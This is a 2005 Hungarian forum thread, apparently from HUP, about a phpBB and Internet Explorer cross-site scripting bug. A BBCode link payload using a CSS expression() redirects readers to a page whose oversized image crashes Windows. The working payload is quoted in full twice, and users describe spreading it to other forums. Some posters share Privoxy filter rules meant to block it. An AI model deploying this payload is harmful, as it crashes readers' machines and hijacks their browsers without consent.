Internet Explorer használok ide!

apropo opera8!

valaki aki opera8at hasznal nezze mar meg ezt plz:
https://www.ebroker.hu/pls/ebrb/ebr_login_html_p.startup

nekem ez midnennel hajlando mukodni csak 8cal nem... (opera7 tokeletesen viszi, IE is...)
egyebkent is jopar https-es cucc docog 8cal, be se jon vagy csak neha bejon neha nem... mas is tapasztalt ilyet?
Nekem ezt csinalja :( ezert hasznalok meg 7est inkabb, azzal megy jol minden

[quote:5595472059="Madman"]apropo opera8!
valaki aki opera8at hasznal nezze mar meg ezt plz:
https://www.ebroker.hu/pls/ebrb/ebr_login_html_p.startup

Megneztem... Opera 8.01
Valami bejelentkezo oldal. Teljesen jonak tunik
a megjelenites.

[quote:77944a29e7="hunger"]Jól látod, a phpbb+IE cross-site scripting probléma az újdonság, csak a megfelelő prezentálás miatt redirectelek a hunger.hu-ra, az ottani bug már több hónapos téma.

Jah a hiba a legujabb (2005. 06. 27-en kiadott) 2.0.16-os phpBB-ben is benne van. Hivatalos javitas, valasz, lofarok nincs (pedig mar tudom, hogy szoltak nekik), ugyhogy addig is workaround-oltam a sz.art.

Ahh ez király volt :)

Kiprobaltam ie- vel es olyan szep kékhátast dobott az XP hogy csak na

druss42

Kipróbáltam, 2000-n csak belassult, de sikerült kilőni. XP-n produkálta a tüneteket, de csak SP1-en, ami pár hónapja nem engedi magát frissíteni.
Persze ettől függetlenül ki az a barom aki képes dózeren explodert használni...

Szerencsetlen vmware :-DDD

wine+ievel csak a redirect megy :)

[quote:adbfd095fd="mpathy"]Kipróbáltam, 2000-n csak belassult, de sikerült kilőni. XP-n produkálta a tüneteket, de csak SP1-en, ami pár hónapja nem engedi magát frissíteni.
Persze ettől függetlenül ki az a barom aki képes dózeren explodert használni...

1000-bol 990 (kb).
De ugy is feltehetnem a kerdest, hogy ki az a ... aki windowsert fizet, aki meg nem az meg nem tud frissiteni. :)

[quote:7946fb0886="mpathy"]ami pár hónapja nem engedi magát frissíteni.

?:)

nekem is dobott keket az xp ; de ez csak sp1-es. csoda sp2 meg osszespatchal is ?

[quote:c3705537be="hokuszpk"]nekem is dobott keket az xp ; de ez csak sp1-es. csoda sp2 meg osszespatchal is ?

Azzal is. "Az ellen nem veeed..."

win xp pro sp2 hun
firefox 1.0.5

hunger.hu/win.html -> reboot

:) ez gas...most ez a ff hibaja, vagy az oprendszere?

[quote:2f472fe917="hunger"][quote:2f472fe917="csefi"]gondolom nem bánod, hogy beraktam, lusta voltam saját oldalt kreálni :D

no problem :wink:

azóta még jópár oldalról jöttek, pl. thebgb.org, meg forum.index.hu... :D

Privoxyval ki lehet szűrni. legalábbis sikerült egyelőre primitív szinten a banners-by-size filter modult használva. :idea:

a csatabárdos topicban találsz screenshotot bizonyítékként. csak erre az egy felbontásra jó. 9999999*9999999, de a semminél így is több.
valahogy úgy kéne pontosítani, hogy vagy monduk 9999 > -ra szűrjön, vagy mondjuk max. 4számjegyű (karakternyi) felbontást engedélyezzen.
Fel kell húzni egy privoxyt a windowsok elé, és akkor jó nagy adag gányolással, de csak nem omlanak össze az ablakok. nekem ennyire futotta. :roll:

http://img.index.hu/imgfrm/4/6/8/4/THM_0000684684.png

[code:1:2f472fe917]
# 9999999*9999999
s@<img\s+(?:src\s*=\s*(['"]?)([^>\\\1\s]+)\1)?[^>]*?(width=(['"]?)9999999\4)[^>]*?(height=(['"]?)9999999\6)[^>]*>@<img src=$1http://config.privoxy.org/send-banner?type=auto$1 title=hungerhehehe width=40 height=40 $5>@sig[/code:1:2f472fe917]

Ez a szűrés elvileg megoldható squid + dansguardian ( http://www.nyetwork.org/wiki/DansGuardian , http://www.dansguardian.org ) segítségével is. Nem próbáltam ki, mert 166MHzes a gép (routerem), és örökkévalóságig fordul minden, és néha elfogy a memória (swap viszont nem, és nem értem, lehet, kernelt kellene cserélnem).

Addig örüljetek amíg lehet mert állítólag az újabb ikszpében már átszínezik a "blue die" -t más hozzáillő színre. (black ?)

ELaci

Nekem ne'mi futyoreszes es szaggatas utan siman ujraindul... (XP SP1)
De mondjuk ez nagyon durva... az meg OK, hogy a bongeszo meghal 1 ilyentol, de hogy az egesz OS...

WinXP SP2 hun, Firefox 1.0.4 -> fagyi
WinXP SP2 hun, IE6 (normalisan frissitett) -> kékhalál/reboot

Ez nem feltetlenul IE bug, inkabb op.rendszer hiba.

[quote:28f7b6168c="eax"]Nekem ne'mi futyoreszes es szaggatas utan siman ujraindul... (XP SP1)
De mondjuk ez nagyon durva... az meg OK, hogy a bongeszo meghal 1 ilyentol, de hogy az egesz OS...

Kapcsold ki, a rendszerhiba eseten ujraindulast. Megkapod a ``jutalmad''. :-)

Nos, némi man grep után kiötlöttem a nagyjából véglegesnek szánt verziót:

[code:1:1628c478d6]# 9999999*9999999
s@<img\s+(?:src\s*=\s*(['"]?)([^>\\\1\s]+)\1)?[^>]*?(width=(['"]?)[[:digit:]]{5,}\4)[^>]*?(height=(['"]?)[[:digit:]]{5,}\6)[^>]*>@<img src=$1http://config.privoxy.org/send-banner?type=auto$1 title=hungerhehehe width=40 height=40 $5>@sig[/code:1:1628c478d6]

Ez elvileg minden 5 vagy hosszabb számjegyből álló felbontású képet bannernek tekint és kibaszkodja.

De jó lenne, ha kis nagybetűkkel kevert ImG SrC, meg hasonló WiDtH-kkal is kirakná hunger többféle felbontásban, hogy valóban eldobálja-e, ha igen, akkor megvan a "tökéletes workaround", mert MS javításra még lehet várni ítéletnapig.

Biztos, hogy OS hiba; Netscape és Opera is omlott tőle.
Valószínűleg valami képmanipulációs API hibája húzódhat a háttérben...

Ma aztán szép kékséget láttam XP alatt és nem a bejelentkező képernyőt :mrgreen: elhihetitek. Amugy Firefoxot használok de azé kipróbáltam (mivel az IE nálam halott valamiért ezért megnéztem Maxthonnal, és ha a Maxthonnal ez történt akkor minden IE-re alapuló böngészőnél igy van, pl. Avant).

Pár helyre még be kéne rakni hogy bizonygassuk: a Windows és az IE NEM BIZTONSÁGOS (együtt használva mégugyse :D )

[quote:396d19cae7="pirate"]
Ez nem feltetlenul IE bug, inkabb op.rendszer hiba.

Ezt mar Hunger reszletesen elmagyarazta korabban a topicban.
A cross site scripting (azaz hogy egy masik oldalon levol linket megnyit) az IE bug (+phpbb), az hogy osszefossa magat a rendszer egy ilyen oldaltol az meg win hiba.

Nincs mit bizonygatni, de felesleges is lenne. Röhögök ezeken a dolgokon, de az ilyen dolgokat mi, az adminok és 'szívességből' karbantartó emberek szívjuk meg, mert nekünk kell folyton szemetet takarítani az ismerősök gépein.

<genyo><poen>Ha belecsempesznem a kodot a HUP index.php-jaba, akkor azt hiszem hamar leszoknanak az emberek a Windows & IE hasznalatrol :-)</poen></genyo>

Khmm.

Vagy a HUP latogatasarol :))

win98 sem fagy, "csak" a kepet nem rakja oda. (ie5, ie6 (ie5 meg az XSS-t sem szivja meg, szol rendesen, h hiba van az oldalban))

Viszont dicseretes, hogy a firefox (linuxon) lathato memorianovekedes _nelkul_ teljesen jol kezeli a bazinagy kepet. (kevesebb, mint 1 megaval no a memoriahasznalata).

Mas kerdes, hogy kicsit nehez igy nezegetni a kepet, minden pixel nagyobb mint az 1600x1200-as monitor :)

de rendkivul figyelmes lenne a bongeszo statisztika javulasa :D

Kiprobaltam NT4 SP6 kifagyott :)

Most mar csak az kell hogy egy kritikus szerveren (microsoft.com) valaki
megsasoljon egy ilyen oldalt... (kezdolapnak idealis) nem kell hozza semmilyen jogosultsag, semmilyen program, stb...
es annyi a szervernek. :-D

Én még nem ismertem, de illik ide (főleg az utolsó mondata) :))))

http://www.eprdel.cz/obrazky/firefox_is_evil.jpg

Ahahh, rájöttem, hogy ez nem bug, hanem fícsör :) Ma távoliasztal-kapcsolaton keresztül dolgoztam egy gépen, ahol nem volt shutdown, command prompt sem, viszont újra kellett indítani a gépet. IE szerencsére volt :)

csak hogy a második oldalon is meglegyen:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`top.location('http://hunger.hu/win.html');this.sss=null`s='][/url][/url]'

[quote:5ec46e7dbd="dikki"]Ahahh, rájöttem, hogy ez nem bug, hanem fícsör :) Ma távoliasztal-kapcsolaton keresztül dolgoztam egy gépen, ahol nem volt shutdown, command prompt sem, viszont újra kellett indítani a gépet. IE szerencsére volt :)

Ez jol esett, koszi :)

Valaki orvendeztesse mar meg Sting-et a pcforumon!... :)

Ahahh, rájöttem, hogy ez nem bug, hanem fícsör :P

[quote:1744e783a6="maszili"]Valaki orvendeztesse mar meg Sting-et a pcforumon!... :)

Már megtörtént:

http://pcforum.hu/tarsalgo/24301-19/Linux+kedvelok+klubja.html

Nagyot hallgatnak a dologról :-)

[quote:1fc108823b="hunger"]Sajnos az ilyen jellegű workaround sosem lesz tökéletes, mindenképp az MS javítása szükséges.

Ami először eszembe jutott, hogy az IE valószínűleg elfogadja a width és height paramétereket idézőjelek nélkül is. Akkor is működik a szűrés? :wink:
És akkor még nem is beszéltem arról, hogy mi van ha javascriptel méretezem át a képet.

Az jutott eszembe, hogy ezek a proxys/szűrős megoldások ugyan ott vesztik el a szerepüket, mint az IDS-ek. Megoldható, hogy egy adott exploitot kiszűrjenek, de aki kiakarja használni a hibát az úgy is megtalálja a kerülőutat, amit ezek a védelmi megoldások nem fognak detektálni...

1. a tökéletes nem véletlenül volt idézőjelben. nyílván egy hotfix lenne az igazi., viszont annak hiányában a geciskedők ellen ez talán "elegendő".
2. szencségit ennek az IE-nek mostmár :evil:, bár idézőjel nélküli verziót is lehetne írni. nem igaz, hogy minden fityfasz kódot elfogad mindenféle formában. :twisted:
3. javascriptet alapból szintén ki kell hajítani a flash-el, quicktimeal, javaval együtt. ez az alap. én ebből indulok ki.
4. van jobb ötleted a hiba "kivédésére" a javítás megjelenéséig / márha megjelenik egyáltalán / ? (~ azon kívül persze hogy windows le bsd/linux fel.)

A "minden internetre irányuló kapcsolatot átnyomok egy proxyn és esetleg módosítom a tartalmat" szemlélet hol hibádzik? Nem igazán látom, hogy a fentebbi szűrés mikor nem megy _ebben_ az esetben. Tunnel-ezett kérések esetén (pl ssh-n keresztülk egy másik proxyhoz csatlakozva) persze megbukik ez.

:)))
Ebben talan az a legnagyobb gaz, hogy kozonséges juzerként megnéztem és akkor is az oldal megtekintése után a kovetkező reakció a géptől, hogy sipolt a bios mert mar butul...
hopsz most megnéztem egy up to date SP2 -s XP foscsomo....
Igen ezen is megy...

[quote:3d54a6301d="hunger"]http://forum.terminal.hu/viewtopic.php?t=27144

loool :lol: :lol: :lol:

ROTFL
:D :D :D

Hmmm..
W98 4.10.2222 A + IE 5.00.2614.3500

Semmi gond. :P

[quote:41ee886f82="hunger"]
hm?

Nem egy helyen nincsen egyetlen gép sem kiengedve közvetlenül az internetre, hanem csak proxyt használhat. Viszont ha már van proxy, akkor azzal a tartalmat is lehet szűrni, tűzfalat is lehet rakni rá. Pl a zorp mindkettőt tudja. A kérdés: hogyan is lehet megkerülni? Bár már menet közben támadt egy 5letem rá: javascript, document.writeln.

valszeg a 4giga memoria miatt lehet, de nalam csak egy "picit" belassult, s nem lett kekhalal...

Semmi nem történik, simán átdobott a http://hunger.hu/win.html oldalra, ahol egy nagy képet, rajta egy "Works on Windows... :)" felirattal.
Conf:
XP+SP2 HUN
IE6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Pedig épp újra akartam butulni a gépet.... :( :( :(
cryp.

[quote:9efbd9ef5d="crypton"]Semmi nem történik, simán átdobott a http://hunger.hu/win.html oldalra, ahol egy nagy képet, rajta egy "Works on Windows... :)" felirattal.
Conf:
XP+SP2 HUN
IE6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Pedig épp újra akartam butulni a gépet.... :( :( :(
cryp.

ja, 1giga rammal, ha ez számít valamit...

Hat azert FF 1.0.4 + WinXP SP1 is ujraindult a hunger.hu/win.html -tol. Az mas kerdes, hogy a Javascript-es reszt nem szivta meg.

Ez viszont egy már régóta ismert windows hiba ;)

Úgy nézki a sima xp se hal tőle össze (máramelyik) :-)

Kipróbáltam, kék halál nem volt, ellenben látszólag csontra fagyott az XP (minden frissítés fenn van). Mozgattam az egeret, úgy 15mp múlva reagált rá, aztán többet nem (vagy csak nem győztem kivárni) és így inkább a power gombot választottam...

[quote:2e2933e0a7="crypton"]Úgy nézki a sima xp se hal tőle össze (máramelyik) :-)

Csak tökéletesen használhatatlanná válik :-D
Eddig ahányon próbáltam, az mint elpusztult. Csak Windows XP-n SP2-vel teszteltem.

Elküldtem két barátomnak az ide mutató linket, csak az egyik kékült :( :twisted: .

Lehet be kellene tenni minden forumon az alairás részbe?? :twisted: :twisted:

a hibát ebben a percben javították redmondban :(
az előbb kipróbáltam, gép újraindult

most jött egy frissítés, letöltöttem, meg akartam mutatni kollegának, hogy figyejje mijen gáz, oszt nem történt semmi :))

[quote:8c983d0899="ksgy"]
most jött egy frissítés, letöltöttem, meg akartam mutatni kollegának, hogy figyejje mijen gáz, oszt nem történt semmi :))

És még mondják, hogy nem figyelik a géped! ;)

[quote:85cd461f8a="ksgy"]a hibát ebben a percben javították redmondban :(

Ott is olvassák a hup-ot. Természetesen :lol:

[quote:de0856c2fc="dikki"]Én még nem ismertem, de illik ide (főleg az utolsó mondata) :))))

http://www.eprdel.cz/obrazky/firefox_is_evil.jpg

Ezzel a képpel ki és mit akar mondani?
Az MS a világnak hogy az arab csákó egy Firefox-szal letöltött-nyomtatott zászlót éget?
Az arab terroristák Firefoxot használva terrorcselekményeket realizálnak?
A terrorista sokkal hatékonyabb ha MS Explorer-t használ mert a Firefox csak zászlóégetésre jó?
Vagy mit????????? :lol:

[quote:a36a454926="testerlnx"][quote:a36a454926="ksgy"]
most jött egy frissítés, letöltöttem, meg akartam mutatni kollegának, hogy figyejje mijen gáz, oszt nem történt semmi :))

És még mondják, hogy nem figyelik a géped! ;)

MegaLOL
:)
:twisted:

semmi nem történik mondom!
nincs lassulás, egérakadás, semmi.
nincsenek frissítések a gépen, csak sima XP+SP2 HUN.
ennyi.

[quote:b67a726414="szgabor"]
Ezzel a képpel ki és mit akar mondani?
Az MS a világnak hogy az arab csákó egy Firefox-szal letöltött-nyomtatott zászlót éget?
Az arab terroristák Firefoxot használva terrorcselekményeket realizálnak?
A terrorista sokkal hatékonyabb ha MS Explorer-t használ mert a Firefox csak zászlóégetésre jó?
Vagy mit????????? :lol:

azt, hogy az IE megvéd a firefoxal zászlót égető araboktól

[quote:7ca35fffde="crypton"]semmi nem történik mondom!
nincs lassulás, egérakadás, semmi.
nincsenek frissítések a gépen, csak sima XP+SP2 HUN.
ennyi.

ja és persze nincsenek automatikus frissítések bekapcsolva.
az oldal simány bejön a nagy képpel, utána simán csinálhatok bármit, nem fagy, nem lassul :-))))
kicsit viszont át van buherálva a group-policy, de régen nem nyúltam hozzá nem tom mit állítottam be....

vazz+
ugyelszallt az xp mint a szel... ATI device driverbeli hibaval, kek halallal... durrva

---
ja: WinXPProEng+SP2+update-k

Látom másnak is az ATI illesztőit basztatja a winfo$. Pedig ez csak a Win hibája :mrgreen:

Mi-e??? Automatikus moderátorscript??? LoL :mrgreen:

[quote:c899a23113="hunger"]Van egy frankó bug(?) IE-ben (köszönhetően a remek fault tolerance html render enginenek), ami kihasználható phpbb fórumon keresztül is, hiába szűri a html tageket... íme:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`top.location('http://hunger.hu/win.html');this.sss=null`s='][/url][/url]'

[code:1:c899a23113]
[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`top.location('http://hunger.hu/win.html');this.sss=null`s='][/url][/url]'
[/code:1:c899a23113][/code]

Nekem ezzel a párossal is sikerült a Windows elhasaltatni
Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.7)

Igaz szegény Mozilla egy kicsit régi. Most jön is az upgrade Firefoxra.

Laci

jah. tegnap este betettem a prog.hu "miert a windows fika" topikjaba ; mar ki is vettek...

[quote:75c80cd74d="hokuszpk"]jah. tegnap este betettem a prog.hu "miert a windows fika" topikjaba ; mar ki is vettek...

Szerintem teljesen felesleges masik forumba postazni. Meg a vegen kisutik, hogy azert romlott el a merevlemezuk, mert rakattintottak. Igaz, hunger? Volt ilyen tegnap :lol:

gondolom nem bánod, hogy beraktam, lusta voltam saját oldalt kreálni :D

hehehee

win alatt megnyitottam probabol a hunger.hu/win.html-t firefoxban, es ugy elszallt a gep mint a kisangyal :)
IE meg megjeleniti a kepet :)P

nem lehetne a win.html-t úgy formázni, hogy csak az hibás legyen és csak az IE értelmezze? :D

hmm errefele xpsp1+opera7 es semmi gondot nem latok ezzel kapcsolatban :)

az Opera ellenall (XPSP2 Opera 8.01)

A redirect részét értem a bugnak.

De, a
hunger.hu/win.html
ugye egy überméretes kép, csak klikk jobb gomb és kép megjelenítése és már elő is bújik a kölök.

Hogyhogy Linux + Firefox alatt nem okoz lassulást? Sőt megy mint a karikacsapás?

Szóval ez két bug, amiből gondolom a redirect rész az újdonság...

[quote:233a75db27="hunger"][quote:233a75db27="ksgy"]hehehee

win alatt megnyitottam probabol a hunger.hu/win.html-t firefoxban, es ugy elszallt a gep mint a kisangyal :)
IE meg megjeleniti a kepet :)P

az érdekes :wink:

Windows XP Prof SP2 + Firefox 1.0.4 tényleg kifekszik az említett URL-től.

Irosgattam a haveroknak, hogy probálják ki.
3 XP + IE - kék
1 XP + IE birta - neki Athlon64-e van ha számit
1 XP + Opera8.0 - birta, ugyan ez a gép Explorerrel hasalt.